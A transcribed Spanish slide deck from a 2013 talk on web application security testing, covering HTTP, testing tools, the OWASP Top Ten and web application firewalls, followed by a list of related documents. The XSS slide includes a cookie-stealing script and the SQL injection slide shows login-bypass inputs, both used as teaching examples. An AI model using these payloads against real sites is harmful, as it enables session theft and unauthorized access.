Testing de Seguridad de Aplicaciones Web

Save this PDF as:
 WORD  PNG  TXT  JPG

Tamaño: px
Comenzar la demostración a partir de la página:

Download "Testing de Seguridad de Aplicaciones Web"

Transcripción

1 Testing de Seguridad de Aplicaciones Web Julio C. Ardita, CISM. 16 de Noviembre de 2013 Coatzacoalcos - MEXICO

2 Temario - Protocolo HTTP - Herramientas de Testing Web. - Vulnerabilidades más comunes - Web Application Firewall 2

3 Protocolo HTTP 3

4 Arquitectura Web Física 4

5 Arquitectura Web Lógica 5

6 Características del Protocolo HTTP HTTP/1.1 definido en RFC 2616 Métodos: GET, HEAD, POST, OPTIONS, PUT, DELETE, TRACE, CONNECT Encabezado Host : indica el nombre del servidor al cual se le realiza el pedido, permite que se utilicen hosts virtuales. Sin Estado. Conexiones TCP persistentes por defecto. Encabezado Connection : permite forzar el cierre de la conexión una vez obtenida la respuesta. Dos tipos de mensajes: Request y Response. 6

7 Formato del Mensaje HTTP REQUEST MÉTODO <ESPACIO> URI <ESPACIO> VERSIÓN <CRLF> [ENCABEZADOS] <CRLF> [CUERPO DEL MENSAJE] Métodos:, GET, HEAD o POST en HTTP/1.0. GET, HEAD, POST, OPTIONS, PUT, DELETE, TRACE o CONNECT en HTTP/1.1. Versión: HTTP/1.0 o HTTP/1.1 Los Encabezados pueden ser de tres tipos: general, de petición y/o de entidad. URI puede ser: *, URL absoluta, o PATH absoluto. 7

8 Métodos HTTP OPTIONS: Métodos disponibles sobre el recurso especificado. GET: Solicitud del recurso especificado. HEAD: Encabezados del recurso especificado. TRACE: Permite realizar debugging. El servidor responde con el mensaje de solicitud como cuerpo del mensaje de respuesta. POST: Permite enviar información al servidor. PUT: Permite subir los datos al servidor para que sean accedidos a través de la URI especificada. DELETE: Eliminar el recurso indicado. CONNECT: Se utiliza con un servidor Proxy que puede ser utilizado como túnel. 8

9 Ejemplo de un Mensaje HTTP REQUEST GET HTTP/1.1 Host: User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-us; rv:1.7.8) Gecko/ Firefox/1.0.4 (Debian package ) Paros/3.2.2 Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,tex t/plain;q=0.8,image/png,*/*;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Charset: ISO ,utf-8;q=0.7,*;q=0.7 9

10 Formato del Mensaje HTTP RESPONSE VERSIÓN <ESPACIO> CÓDIGO_DE_ESTADO DESCRIP <CRLF> [ENCABEZADOS] <CRLF> [CUERPO DEL MENSAJE] Versión: HTTP/1.0 o HTTP/1.1 El código de estado es un número de tres dígitos que indica el estado de la respuesta. Descrip es una breve frase que explica el código de estado. Los Encabezados pueden ser de tres tipos: general, de respuesta y/o de entidad. 10

11 Ejemplo de un Mensaje HTTP RESPONSE HTTP/ OK Server: Microsoft-IIS/5.0 X-Powered-By: ASP.NET Content-Location: Date: Thu, 30 Jun :33:33 GMT Content-Type: text/html Accept-Ranges: bytes Last-Modified: Tue, 28 Jun :15:58 GMT Content-Length: 577 <html> <head> <title>mi.banco - Pagina Principal</title> <meta http-equiv="content-type" content="text/html; charset=iso "> </head>... 11

12 Códigos de Estado Rango 1xx: Informativos, se recibió el pedido y se está procesando. Rango 2xx: Pedido Exitoso, se recibió el pedido, se comprendió y se acceptó. Rango 3xx: Redirección, se debe realizar otro pedido para completar la solicitud. Rango 4xx: Error del Cliente, la solicitud está mal formulada o no se puede llevar a cabo. Rango 5xx: Error del Servidor, el servidor no pudo completar un solicitud aparentemente válida. 12

13 Códigos de Estado Algunos Ejemplos "200" OK: La solicitud fue exitosa. "301" Moved Permanently: Se le asignó una nueva URI al recurso. "302" Found: El recurso está accesible, temporalmente, en otra URI. "304" Not Modified: No se modificó el recurso desde que el cliente lo accedió. 400" Bad Request: Petición errónea. "401" Unauthorized: No está autorizado a acceder el recurso, se debe enviar los encabezados de autenticación. "403" Forbidden: El servidor comprende la solicitud pero no va a permitir el acceso al recurso. "404" Not Found: Recurso no encontrado. "405" Method Not Allowed: No se permite el uso del método sobre el recurso. "500" Internal Server Error: Error en el servidor al procesar el pedido. "505" HTTP Version not supported: versión HTTP no soportada. 13

14 Manejo de Sesión: Cookies - Mecanismo para el manejo de estado en el protocolo HTTP. - Se define en los RFC 2109, y RFC 2965 añade la versión 2. - Define el encabezado Set-Cookie: Set-Cookie: NAME=nombre; Comment=comentario; Domain=dominio; Max-Age=delta-segundos; Path=path; Secure; Version=version Los campos NAME, y Version son los únicos requeridos. Domain: dominio para el cual la cookie es válida. Max-Age: tiempo de vida, en segundos, de la cookie. Path: especifica el subconjunto de URL s para las que aplica la cookie. Secure: la cookie debe ser manejada de forma segura a definir por el Navegador Web. 14

15 Herramientas de Testing Web 15

16 Proxy Local: Burp Un proxy local permite interceptar los pedidos del navegador y modificarlos. ( 16

17 Scanner de Vulnerabilidades: Nikto Un Scanner de vulnerabilidades analiza el servidor verificando problemas comunes de configuración, versiones desactualizadas o vulnerables, y problemas de seguridad de distintos servidores y aplicaciones Web. ( 17

18 Scanner de Vulnerabilidades: N-Stealth ( 18

19 Vulnerabilides más comunes 19

20 OWASP TOPTEN Nr Vulnerabilidad A1 Cross Site Scripting (XSS) Secuencia de Comandos en Sitios Cruzados A2 Injection Flaws Fallas de Inyección A3 Malicious File Execution Ejecución de ficheros malintencionados A4 Insecure Direct Object Reference Referencia Directa a Objetos Insegura A5 A6 A7 Cross Site Request Forgery (CSRF) Information Leakage and Improper Error Handling Broken Authentication and Session Management Vulnerabilidad de Falsificación de Petición en Sitios Cruzados Revelación de Información y gestión Incorrecta de Errores Pérdida de Autenticación y Gestión de Errores A8 Insecure Cryptographic Storage Almacenamiento criptográfico inseguro A9 Insecure Communications Comunicaciones Inseguras A10 Failure to Restrict URL Access Falla de restricción de acceso a URL 20

21 Cross-Site Scripting Un ataque de Cross-Site Scripting consiste en la inclusión de un script en una página Web que se ejecuta cuando la página es accedida por un usuario

22 Cross-Site Scripting: Qué se puede hacer? Robo de Credenciales: <script>document.location=' +document.cookie</script> El script anterior envía las cookies de quién lo ejecute. Redirección de Cliente: <script>document.location= El script anterior redirecciona al usuario a el sitio especificado. En resumen... Lo que se pueda hacer con Javascript! 22 22

23 Cross-Site Scripting y Phishing Ejemplo: La URL es la del sitio, sin embargo se visualiza otro sitio a través de una vulnerabilidad de XSS 23 23

24 Escalación de Privilegios y Manejo de Sesión Session Prediction: Las aplicaciones vulnerables generan credenciales de autenticación predecibles; permitiendo deducir las credenciales de un usuario autenticado o las que van a ser asignadas al próximo usuario que se autentique. Ejemplo: La cookie asignada a cada usuario se realiza en forma secuencial

25 SQL Injection Es una técnica cuyo objetivo es el de inyectar consultas SQL arbitrarias en páginas vulnerables que interactúan con una Base de Datos, logrando de esta forma obtener, modificar y/o eliminar información sensible. Atacando ciertos motores de Bases de Datos es posible, también, lograr la ejecución de comandos del Sistema Operativo

26 SQL Injection Conceptos Básicos 26 26

27 SQL Injection Demostración: Eludiendo Logins SELECT * FROM Usuarios WHERE Username = luis AND Password = clave SELECT * FROM Usuarios WHERE Username = OR 1=1-- AND Password = aa SELECT * FROM Usuarios WHERE Username = admin -- AND Password = aa 27 27

28 Web Application Firewall 28

29 Qué es WAF? Una WAF es un Firewall de aplicaciones web que funciona a nivel de la capa 7 del modelo OSI. Nos permite frenar intentos de intrusión a nivel de aplicaciones web. Existen varias soluciones: - URLSCAN de Microsoft - Mod_Secuity sobre Apache. - Soluciones comerciales (CISCO, BlueCoat, F5, etc). 29

30 ModSecurity ( Módulo para el servidor Web Apache. Actúa como IDS entre el cliente y el servidor Web; filtra los pedidos en base a expresiones regulares. Nos permite filtrar por: El encabezado HTTP La URL El payload Las acciones permitidas son: Logear el pedido Rechazar el pedido (permite especificar el HTTP status de la respuesta) Redireccioner el pedido Dejar pasar el pedido 30

31 Modos de Operación del WAF Proxy Reverso: Se redirige el tráfico HTTP(S) para que pase a través del WAF que está actuando como un proxy reverso. Es decir, recibe las peticiones HTTP, las resuelve contra los servidores Web y, luego, las reenvía al cliente. Esto le permite procesar los pedidos y las respuesta en busca de ataques o resultados de los ataques. 31

32 Capacidades de Filtrado: Qué puede ver? El WAF puede actuar sobre las siguientes porciones de un pedido HTTP y/o de una respuesta HTTP: Métodos Versión del protocolo Encabezados Cuerpo del mensaje URL Código de respuesta IP Origen MÉTODO <ESPACIO> URI <ESPACIO> VERSIÓN <CRLF> [ENCABEZADOS] <CRLF> [CUERPO DEL MENSAJE] VERSIÓN <ESPACIO> CÓDIGO_DE_ESTADO DESCRIP <CRLF> [ENCABEZADOS] <CRLF> [CUERPO DEL MENSAJE] 32

33 Conclusiones El área de testing de seguridad de aplicaciones web es muy amplio y requiere de conocimientos de redes, bases de datos, sistemas operativos y programación. Se detectan vulnerabilidades de seguridad en el 70% de las aplicaciones web que nosotros hemos evaluado. Es una excelente área para investigar y desarrollarse. 33

34 Testing de Seguridad de Aplicaciones Web Julio C. Ardita, CISM. 16 de Noviembre de 2013 Coatzacoalcos - MEXICO

Seguridad en Aplicaciones Web

Seguridad en Aplicaciones Web Seguridad en Aplicaciones Web Leandro Meiners lmeiners@cybsec cybsec.comcom Septiembre de 2005 Buenos Aires - ARGENTINA Temario Temario Introducción al Protocolo HTTP: Arquitectura, carácterísticas, autenticación,

Más detalles

VÍDEO intypedia007es LECCIÓN 7: SEGURIDAD EN APLICACIONES WEB. INTRODUCCIÓN A LAS TÉCNICAS DE INYECCIÓN SQL. AUTOR: Chema Alonso

VÍDEO intypedia007es LECCIÓN 7: SEGURIDAD EN APLICACIONES WEB. INTRODUCCIÓN A LAS TÉCNICAS DE INYECCIÓN SQL. AUTOR: Chema Alonso VÍDEO intypedia007es LECCIÓN 7: SEGURIDAD EN APLICACIONES WEB. INTRODUCCIÓN A LAS TÉCNICAS DE INYECCIÓN SQL AUTOR: Chema Alonso Consultor de Seguridad en Informática 64. Microsoft MVP Enterprise Security

Más detalles

Tema 2 El Servicio Web

Tema 2 El Servicio Web Tema 2 El Servicio Web Eduardo Martínez Graciá Humberto Martínez Barberá Departamento de Ingeniería de la Información y las Comunicaciones Universidad de Murcia Introducción Nace en el CERN, en 1989 Surge

Más detalles

Capítulo 2.- Vulnerabilidades en aplicaciones web.

Capítulo 2.- Vulnerabilidades en aplicaciones web. Capítulo 2.- Vulnerabilidades en aplicaciones web. En este capítulo se explican algunas vulnerabilidades en aplicaciones web que pueden ser explotadas por software o por personas malintencionadas y como

Más detalles

HTTP Introducción. Redes de Datos Ing. Marcelo Utard / Ing. Pablo Ronco FACULTAD DE INGENIERIA UNIVERSIDAD DE BUENOS AIRES

HTTP Introducción. Redes de Datos Ing. Marcelo Utard / Ing. Pablo Ronco FACULTAD DE INGENIERIA UNIVERSIDAD DE BUENOS AIRES Introducción Protocolo de capa de aplicación utilizado para la transferencia de Recursos u objetos. Opera sobre TCP típicamente en el puerto 80 Simple Stateless Genérico Utiliza las extenciones MIME. Transporte

Más detalles

POLICÍA FEDERAL DIVISIÓN CIENTÍFICA COORDINACIÓN PARA LA PREVENCIÓN DE DELITOS ELECTRÓNICOS SEGURIDAD EN APLICACIONES WEB PRIMERA PARTE

POLICÍA FEDERAL DIVISIÓN CIENTÍFICA COORDINACIÓN PARA LA PREVENCIÓN DE DELITOS ELECTRÓNICOS SEGURIDAD EN APLICACIONES WEB PRIMERA PARTE POLICÍA FEDERAL DIVISIÓN CIENTÍFICA COORDINACIÓN PARA LA PREVENCIÓN DE DELITOS ELECTRÓNICOS SEGURIDAD EN APLICACIONES WEB PRIMERA PARTE 1 Obje%vo El asistente aprenderá los conceptos básicos sobre los

Más detalles

HTTP. Redes I. Departamento de Sistemas Telemáticos y Computación (GSyC) Noviembre de 2011. GSyC - 2011 HTTP 1

HTTP. Redes I. Departamento de Sistemas Telemáticos y Computación (GSyC) Noviembre de 2011. GSyC - 2011 HTTP 1 HTTP Redes I Departamento de Sistemas Telemáticos y Computación (GSyC) Noviembre de 2011 GSyC - 2011 HTTP 1 c 2011 Grupo de Sistemas y Comunicaciones. Algunos derechos reservados. Este trabajo se distribuye

Más detalles

INTERCAMBIO DE OBJETOS

INTERCAMBIO DE OBJETOS Departament d Arquitectura de Computadors INTERCAMBIO DE OBJETOS HTTP: Hypertext Transfer Protocol Protocolo de comunicaciones estandarizado que comunica servidores, proxies-cachés y clientes. Permite

Más detalles

Seguridad en Sistemas Informáticos (SSI) Programación Segura

Seguridad en Sistemas Informáticos (SSI) Programación Segura 1 Seguridad en Sistemas Informáticos (SSI) Programación Segura Carlos Pérez Conde Departament d'informàtica Escola Técnica Superior d'enginyeria Universitat de València 2 Bibliografía específica OWASP

Más detalles

Clase. geniería de la Computación. Departamento de Ciencias e Ing. Diego C. Martínez - DCIC-UNS

Clase. geniería de la Computación. Departamento de Ciencias e Ing. Diego C. Martínez - DCIC-UNS Ingeniería de Ap plicaciones Web Clase 2 Diego C. Martínez Departamento de Ciencias e Ing geniería de la Computación Universidad Nacional del Sur Internet y sus servicios Internet define una forma de conexión

Más detalles

Ingeniero Técnico en Informática - UCA Máster en Ingeniería del Software - US Máster en Seguridad de las TIC - US

Ingeniero Técnico en Informática - UCA Máster en Ingeniería del Software - US Máster en Seguridad de las TIC - US Sobre mi Formación Ingeniero Técnico en Informática - UCA Máster en Ingeniería del Software - US Máster en Seguridad de las TIC - US Experiencia Aficiones 4+ años como desarrollador web, más de 2 en Drupal

Más detalles

Web : Ataque y Defensa. Claudio Salazar Estudiante Ing. Civil Informática UTFSM Pinguinux Team

Web : Ataque y Defensa. Claudio Salazar Estudiante Ing. Civil Informática UTFSM Pinguinux Team Web : Ataque y Defensa. Claudio Salazar Estudiante Ing. Civil Informática UTFSM Pinguinux Team Temario 1. Introducción 2. Cross Site Scripting (XSS) 3. Inyección SQL 4. Nuestro código en el servidor 5.

Más detalles

HyperText Transfer Protocol

HyperText Transfer Protocol HyperText Transfer Protocol Ing. Carlos A. Barcenilla c.a.barcenilla@ieee.org Basado en HTTP Made Really Easy http://www.jmarshall.com/easy/http/ 1 Qué es HTTP? HTTP significa Hypertext Transfer Protocol.

Más detalles

HyperText Transfer Protocol

HyperText Transfer Protocol Qué es HTTP? HTTP significa Hypertext Transfer Protocol. HyperText Transfer Protocol Ing. Carlos A. Barcenilla c.a.barcenilla@ieee.org Es el protocolo de red que se utiliza para transferir los archivos

Más detalles

Tema 2: Protocolo HTTP.

Tema 2: Protocolo HTTP. Tema 2: Protocolo HTTP. 1. Introducción. 2. Mensajes HTTP. 1. Partes del mensaje. 2. Primera línea del mensaje 3. Cabeceras del mensaje. 4. Cuerpo del mensaje. 3. Elementos Avanzados. 1. Cookies 2. Manejo

Más detalles

Funcionamiento de Servicios Web, FTP

Funcionamiento de Servicios Web, FTP Funcionamiento de Servicios Web, FTP Tema 2.- Nivel de aplicación en Internet Dr. Daniel Morató Redes de Computadores Ingeniero Técnico en Informática de Gestión, 2º curso Material adaptado del libro Computer

Más detalles

Día 23, Hacking ético: Auditoria web y perspectiva desde la Administración Publica

Día 23, Hacking ético: Auditoria web y perspectiva desde la Administración Publica Día 23, Hacking ético: Auditoria web y perspectiva desde la Administración Publica DANIEL FIRVIDA PEREIRA Técnico de seguridad - INTECO-CERT 23 de Noviembre 1º ENCUENTRO NACIONAL DE LA INDUSTRIA DE SEGURIDAD

Más detalles

LOS 7 PECADOS DEL DESARROLO WEB & TENTACIÓN DEL USUARIOS EN APLICACIONES MOVILES. www.owasp.org

LOS 7 PECADOS DEL DESARROLO WEB & TENTACIÓN DEL USUARIOS EN APLICACIONES MOVILES. www.owasp.org LOS 7 PECADOS DEL DESARROLO WEB & TENTACIÓN DEL USUARIOS EN APLICACIONES MOVILES www.owasp.org Quien soy? Ing. Elvin Vidal Mollinedo Mencia Profesional de seguridad + 9 años de experiencia en desarrollo

Más detalles

Máster Profesional en Tecnologías de Seguridad. Seguridad en la web

Máster Profesional en Tecnologías de Seguridad. Seguridad en la web Máster Profesional en Tecnologías de Seguridad Módulo VI - Programación Segura Seguridad en la web @josereyero http://www.reyero.net consulting@reyero.net Seguridad en la Web Introducción y objetivos Programa

Más detalles

5.1 Introducción. 5.2 El protocolo HTTP.

5.1 Introducción. 5.2 El protocolo HTTP. TEMA 5:. 5.1 Introducción. Inicialmente la idea del World Wide Web 1 surgió en el laboratorio de altas energías del CERN, el Centro Europeo de Investigación Nuclear. La mayoría de los experimentos, altamente

Más detalles

Ataques Web Automáticos: Identificación, Engaño y Contraataque

Ataques Web Automáticos: Identificación, Engaño y Contraataque Ataques Web Automáticos: Identificación, Engaño y Contraataque Mariano Nuñez Di Croce mnunez@cybsec cybsec.comcom Noviembre 2005 CIBSI 05 Valparaíso, Chile Agenda - Introducción a las Herramientas Automáticas.

Más detalles

Protocolos de WWW. Bibliografía: Redes de Computadores: un enfoque descendente basado en Internet : J.F Kurose y K.W. Ross. GSyC 2007.

Protocolos de WWW. Bibliografía: Redes de Computadores: un enfoque descendente basado en Internet : J.F Kurose y K.W. Ross. GSyC 2007. HTTP Para realizar este material se han utilizado algunas transparencias proporcionadas junto con el libro Redes de Computadores: un enfoque descendente basado en Internet : Copyright 1996-2002. J.F Kurose

Más detalles

WAPITI. Escaner de vulnerabilidades de aplicaciones web y auditor de seguridad. VI OWASP Spain Chapter Meeting

WAPITI. Escaner de vulnerabilidades de aplicaciones web y auditor de seguridad. VI OWASP Spain Chapter Meeting ARGENTINA COLOMBIA CHILE ESPAÑA EE.UU. MÉXICO PANAMÁ VENEZUELA David del Pozo González dpozog@grupogesfor.com WAPITI Escaner de vulnerabilidades de aplicaciones web y auditor de seguridad Junio 2010 www.gesfor.es

Más detalles

DESARROLLO DE APLICACIONES PARA LA WEB II

DESARROLLO DE APLICACIONES PARA LA WEB II INSTITUTO POLITÉCNICO NACIONAL ESCUELA SUPERIOR DE CÓMPUTO DESARROLLO DE APLICACIONES PARA LA WEB II ENCABEZADOS Y MÉTODOS BELEN HURTADO ORTIZ 2008630140 8CV5 ENCABEZADOS Y MÉTODOS DE HTTP Comandos Comando

Más detalles

Servicio de publicación de información web (HTTP)

Servicio de publicación de información web (HTTP) Servicio de publicación de información web (HTTP) La Web es uno de los servicios más comunes en Internet, tanto que se ha convertido en su cara visible para la mayoría de los usuarios. Una página Web empezó

Más detalles

CRSP - OWASP! Motivación! Arquitectura de despliegue Mod_Security! Conclusiones!!

CRSP - OWASP! Motivación! Arquitectura de despliegue Mod_Security! Conclusiones!! Motivación Arquitectura de despliegue Mod_Security Conclusiones Introducción Definiciones IT = TI Actores Entes reguladores Clientes Proveedores Población General GRAFO DE INTERRELACIONES DE ACTORES Publicación

Más detalles

PROTOCOLO HTTP. Hypertext Transfer Protocol

PROTOCOLO HTTP. Hypertext Transfer Protocol 1 PROTOCOLO HTTP Hypertext Transfer Protocol INTRODUCCIÓN HTTP: HyperText Transfer Protocol Fue desarrollado por el consorcio W3C y la IETF. El protocolo de transferencia de hipertexto es el protocolo

Más detalles

Sesión 13. Seguridad en la web. Luisa Fernanda Rincón Pérez 2015-1

Sesión 13. Seguridad en la web. Luisa Fernanda Rincón Pérez 2015-1 Sesión 13. Seguridad en la web Luisa Fernanda Rincón Pérez 2015-1 Qué vimos la clase pasada? 1. Características de MongoDB 2. Colecciones - documentos 3. Consulta, inserción, modificación, eliminación

Más detalles

Andrés Riancho andres@bonsai-sec.com. Martin Tartarelli martin.tartarelli@gmail.com. Copyright 2008 CYBSEC. All rights reserved.

Andrés Riancho andres@bonsai-sec.com. Martin Tartarelli martin.tartarelli@gmail.com. Copyright 2008 CYBSEC. All rights reserved. Testingde seguridad en aplicaciones Web -Una introducción - Andrés Riancho andres@bonsai-sec.com Martin Tartarelli martin.tartarelli@gmail.com Copyright 2008 CYBSEC. All rights reserved. Andrés Riancho

Más detalles

AGENDA. Mejorando la Seguridad en Aplicaciones Web. Introducción. La Web Promesas y Amenazas. Asegurando la Red y el Servidor de Web

AGENDA. Mejorando la Seguridad en Aplicaciones Web. Introducción. La Web Promesas y Amenazas. Asegurando la Red y el Servidor de Web Universidad ORT Uruguay Mejorando la Seguridad en Aplicaciones Web Ing. Cecilia Belletti Ing. Angel Caffa, MSc Ing. Isaac Rodríguez IntegraTICs 7 de diciembre, 2006 AGENDA Introducción La Web Promesas

Más detalles

Hacking Ético Web. I Jornadas Tecnológicas CEEPS 27-03-2012 Carlos García García i52gagac@uco.es ciyinet@gmail.com. @ciyinet

Hacking Ético Web. I Jornadas Tecnológicas CEEPS 27-03-2012 Carlos García García i52gagac@uco.es ciyinet@gmail.com. @ciyinet Hacking Ético Web I Jornadas Tecnológicas CEEPS 27-03-2012 Carlos García García i52gagac@uco.es ciyinet@gmail.com @ciyinet Índice Introducción OWASP OWASP Top 10 (2010) Demostración ataques Inyección SQL

Más detalles

Seminario de SEGURIDAD WEB. Pedro Villena Fernández www.consultoriainnova.com

Seminario de SEGURIDAD WEB. Pedro Villena Fernández www.consultoriainnova.com Seminario de SEGURIDAD WEB Pedro Villena Fernández www.consultoriainnova.com Algunas cosas antes de empezar... Este seminario NO tiene la intención de piratear otras webs. Los ataques que aprenderemos

Más detalles

Introducción al desarrollo web (idesweb)

Introducción al desarrollo web (idesweb) Introducción al desarrollo web (idesweb) Práctica 8: PHP 2 (cookies y sesiones) 1. Objetivos Conocer el concepto de cookie y sus posibles usos. Aprender a utilizar las cookies con PHP. Conocer el concepto

Más detalles

About Me. Mario Robles Tencio

About Me. Mario Robles Tencio About Me Mario Robles Tencio Profesional de seguridad +10 años de experiencia en tema de seguridad de redes, desarrollo de aplicaciones web, seguridad de aplicaciones web, PenTesting (Ethical Hacking)

Más detalles

Clase 22 Nivel de Aplicación WWW Tema 6.- Nivel de aplicación en Internet

Clase 22 Nivel de Aplicación WWW Tema 6.- Nivel de aplicación en Internet Clase 22 Nivel de Aplicación WWW Tema 6.- Nivel de aplicación en Internet Dr. Daniel Morató Redes de Computadores Ingeniero Técnico de Telecomunicación Especialidad en Sonido e Imagen 3º curso Temario

Más detalles

S E G U R I D A D E N A P L I C A C I O N E S W E B

S E G U R I D A D E N A P L I C A C I O N E S W E B H E R R A M I E N T A S A V A N Z A DA S D E DE S A R R O L L O D E S O F T W A R E 2 0 0 7-2 0 0 8 S E G U R I D A D E N A P L I C A C I O N E S W E B X S S Y S Q L I N J E C T I O N G R U P O 2 4 S A

Más detalles

Protocolo HTTP Apache. Servicios HTTP. Esteban De La Fuente Rubio esteban@delaf.cl L A TEX. Universidad Andrés Bello. 17 jun 2011

Protocolo HTTP Apache. Servicios HTTP. Esteban De La Fuente Rubio esteban@delaf.cl L A TEX. Universidad Andrés Bello. 17 jun 2011 HTTP esteban@delaf.cl L A TEX Universidad Andrés Bello 17 jun 2011 Tabla de contenidos 1 Protocolo HTTP 2 Protocolo HTTP Hypertext Transfer Protocol. Protocolo utilizado para las transacciones en Internet.

Más detalles

La web (el servicio WWW)

La web (el servicio WWW) Introducción Ingeniería de Telecomunicación grex@gsyc.es GSyC, Universidad Rey Juan Carlos 24 de noviembre de 2008 (cc) 2008 Some rights reserved. This work licensed under Creative Commons Attribution-ShareAlike

Más detalles

Qué significan los errores más habituales que devuelve Apache y cómo solucionarlos?

Qué significan los errores más habituales que devuelve Apache y cómo solucionarlos? Qué significan los errores más habituales que devuelve Apache y cómo solucionarlos? Cardenal Gardoki, 1 48008 BILBAO (Vizcaya) Teléfono: 902 012 199 www.hostalia.com Para que las páginas web puedan estar

Más detalles

SEGURIDAD WEB: AUDITORÍAS Y HERRAMIENTAS. Daniel Firvida Pereira daniel.firvida@inteco.es Marzo de 2009

SEGURIDAD WEB: AUDITORÍAS Y HERRAMIENTAS. Daniel Firvida Pereira daniel.firvida@inteco.es Marzo de 2009 SEGURIDAD WEB: AUDITORÍAS Y HERRAMIENTAS Daniel Firvida Pereira daniel.firvida@inteco.es Marzo de 2009 Índice Seguridad Web: Auditorías y Herramientas 0. Presentación INTECO 1. Auditorías Web 1) Introducción

Más detalles

Seguridad en Aplicaciones Web

Seguridad en Aplicaciones Web Seguridad en Aplicaciones Web Fabian Portantier Consultor en Seguridad Informática Instructor y Escritor sobre el tema Coordinador de la Carrera de Seguridad www.portantier.com Aplicaciones Web Actuales

Más detalles

Principales vulnerabilidades en aplicaciones Web. Christian Martorella Edge-security.com

Principales vulnerabilidades en aplicaciones Web. Christian Martorella Edge-security.com Principales vulnerabilidades en aplicaciones Web Christian Martorella Edge-security.com 1 #Whoami: Christian Martorella Cofundador Edge-security.com CISSP, CISM, CISA, OPST, OPSA Actualmente trabajando

Más detalles

TEMA 3: La Aplicación World Wide Web

TEMA 3: La Aplicación World Wide Web TEMA 3: La Aplicación World Wide Web 1. Introducción 2. Terminología 3. El protocolo HTTP 4. Conexiones HTTP 5. Mensajes HTTP 6. Interacción Usuario-Servidor 7. El GET condicional 8. Distribución de contenidos

Más detalles

Web: Ataque y Defensa. my kung fu is stronger than yours, The lone Gunmen

Web: Ataque y Defensa. my kung fu is stronger than yours, The lone Gunmen Web: Ataque y Defensa. my kung fu is stronger than yours, The lone Gunmen Web: Ataque y defensa Introducción. Cross Site Scripting (XSS). SQL Injection. Programador? quien yo?. Ataques NG. Prevención.

Más detalles

Segurinfo NOA 2011. Seguridad en el desarrollo de aplicaciones Web

Segurinfo NOA 2011. Seguridad en el desarrollo de aplicaciones Web Segurinfo NOA 2011 Seguridad en el desarrollo de aplicaciones Web Hernán Santiso Gerente de Seguridad de la Información Claro Argentina, Uruguay y Paraguay hsantiso@claro.com.ar Introducción El problema

Más detalles

Seguridad en Sistemas Informáticos Seguridad y WWW. Mikel Izal Azcárate (mikel.izal@unavarra.es)

Seguridad en Sistemas Informáticos Seguridad y WWW. Mikel Izal Azcárate (mikel.izal@unavarra.es) Seguridad en Sistemas Informáticos Seguridad y WWW Mikel Izal Azcárate (mikel.izal@unavarra.es) Indice Seguridad en WWW > Seguridad en la autentificación > Seguridad en la autorización > Ataques de validación

Más detalles

Redes de Computadoras Práctica 4: World Wide Web

Redes de Computadoras Práctica 4: World Wide Web World Wide Web Redes de Computadoras DCyT, UNQ Redes de Computadoras Práctica 4: World Wide Web Temas PANORAMA DE LA ARQUITECTURA, DOCUMENTOS WEB ESTÁTICOS, DOCUMENTOS WEB DINÁMICOS, HTTP PROTOCOLO DE

Más detalles

Aplicaciones Web (Curso 2015/2016)

Aplicaciones Web (Curso 2015/2016) Seguridad en Aplicaciones Web Aplicaciones Web (Curso 2015/2016) Jesús Arias Fisteus // jaf@it.uc3m.es Seguridad en Aplicaciones Web p. 1 Seguridad en aplicaciones Web «This site is absolutely secure.

Más detalles

Curso 2008/2009 Arquitecturas Distribuidas 3

Curso 2008/2009 Arquitecturas Distribuidas 3 II. Cookies 1. Qué son cookies? 2. Funcionamiento de cookies 3. Envío de cookies al cliente 4. Gestión de cookies en el cliente 5. Devolución de cookies al servidor 6. Ejemplos de transacciones con cookies

Más detalles

Redes de Computadores II

Redes de Computadores II Redes de Computadores II Capa de Aplicación HTTP Las siguientes láminas son material de apoyo para el estudio de la materia de Redes II. No son un contenido exhaustivo del material. Se recomienda suplementar

Más detalles

Desarrollo y servicios web

Desarrollo y servicios web Desarrollo y servicios web Luisa Fernanda Rincón Pérez 2014-2 2 Sesión 3. Arquitectura web básica parte 2 Qué haremos hoy? 3 1. La era post pc 2. Nombres de dominio 3. URL 4.HTTP( GET / POST) La era post-pc

Más detalles

Desarrollo y servicios web

Desarrollo y servicios web Desarrollo y servicios web Luisa Fernanda Rincón Pérez 2015-1 Qué vimos la clase pasada? 1. Fin tutorial HTML 2. Nombres de dominio 3. URLs 3 Sesión 4. Método GET - POST Qué haremos hoy? 1. Tipos de solicitudes

Más detalles

Seguridad en Sitios Web de Alto Tráfico. Ing. Enrique Hurtarte Juárez

Seguridad en Sitios Web de Alto Tráfico. Ing. Enrique Hurtarte Juárez Seguridad en Sitios Web de Alto Tráfico Ing. Enrique Hurtarte Juárez Guatemala, 24 de Julio de 2014 XumaK Quienes somos XumaK es una empresa que fue fundada en 2003 por Marcos Andres como una de las primeras

Más detalles

SEGURIDAD SEGURIDAD. Guía de Comunicación Digital para La Administración General del Estado. Página 1 de 15

SEGURIDAD SEGURIDAD. Guía de Comunicación Digital para La Administración General del Estado. Página 1 de 15 Página 1 de 15 REQUISITOS ANTES DE TENER EL SITIO WEB 3 5. 3 5.1 INYECCIÓN DE CÓDIGO 5 5.2. SECUENCIA DE COMANDOS EN SITIOS CRUZADOS (CROSS SITE SCRIPTING XSS) 7 5.3. PÉRDIDA DE AUTENTICACIÓN Y GESTIÓN

Más detalles

Ataques XSS en Aplicaciones Web

Ataques XSS en Aplicaciones Web Ataques XSS en Aplicaciones Web Education Project Antonio Rodríguez Romero Consultor de Seguridad Grupo isoluciones antonio.rodriguez@isoluciones.es Copyright 2007 The Foundation Permission is granted

Más detalles

WWW (HTTP PROXY - CACHING)

WWW (HTTP PROXY - CACHING) WWW (HTTP PROXY - CACHING) Integrantes : Calderón, Ingrid Coronel, Luis Junco, Sebastián Marx, Martín HTTP Protocolo de transferencia de hipertexto HTTP - Introducción El protocolo HTTP define la sintaxis

Más detalles

Desarrollo seguro en Drupal. Ezequiel Vázquez De la calle

Desarrollo seguro en Drupal. Ezequiel Vázquez De la calle Sobre mi Estudios Ingeniero Técnico en Informática - UCA Máster en Ingeniería del Software - US Experto en Seguridad de las TIC - US Experiencia Aficiones 3+ años como desarrollador web, casi 2 en Drupal

Más detalles

Workshop de HTTP leaked version 1

Workshop de HTTP leaked version 1 66.62 Redes de Computadoras Workshop de HTTP leaked version 1 Matsunaga, Nicolás 1 esto significa que está más que incompleto 1. er cuatrimestre 2012 ÍNDICE Índice 1. Objetivo del apunte 2 2. Introducción

Más detalles

